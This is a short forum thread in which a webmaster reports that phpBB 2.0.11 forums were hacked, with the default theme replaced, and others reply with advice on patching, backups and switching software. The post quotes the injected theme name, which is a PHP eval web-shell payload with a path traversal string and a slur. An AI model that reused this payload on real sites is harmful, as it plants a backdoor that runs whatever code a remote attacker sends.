Default phpbb hacked

These day I have to fix 2 forums that it seems to be hacked. Guys...this has been a nightmare to me...I hate hackers.
My customised default template on my install of phpBB has been removed and replaced by a style FI Black, though it has the name

aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp

The forum was on phpbb version 2.0.11. If you delete only the theme from the admin is not enough, you have to edit also the database the table: phpbb_themes
and in many other places. Some people say that is enough to done this. For one of the forum I have fix was not enough.

Did any of you have this problem?

Ovi

That sucks, I think I need to know more about what patches and fixes are available in order to make my site more secure and protect it from hackers.

Default right

Right, My honest opinion delete phpbb from your sites and made a little investment in vBulletin. It's better, believe me.

Just keep up to date and back up regularly (normal practice for any software). The truth is if vBulletin becomes popular enough, hackers will get to it too. Nothing is safe.

Exactly, no site, no CMS, and no database is 100% secure, all you can do is slow down the progress of a hacker but not the fact you can still be hacked.

Is 2.0.11 the latest version of phpBB? For some reason I thought they were into the 2.0.14 version area. I could be wrong.

I'd suggest going to the forums and asking if they know why you have the problem and what you can do to fix it. The problem now becomes that you have a hacker who's interested in making your life difficult. No matter what you change to, it may be likely you'll be attacked again and again.

Do you think there's a chance that you can trace this arse's IP?
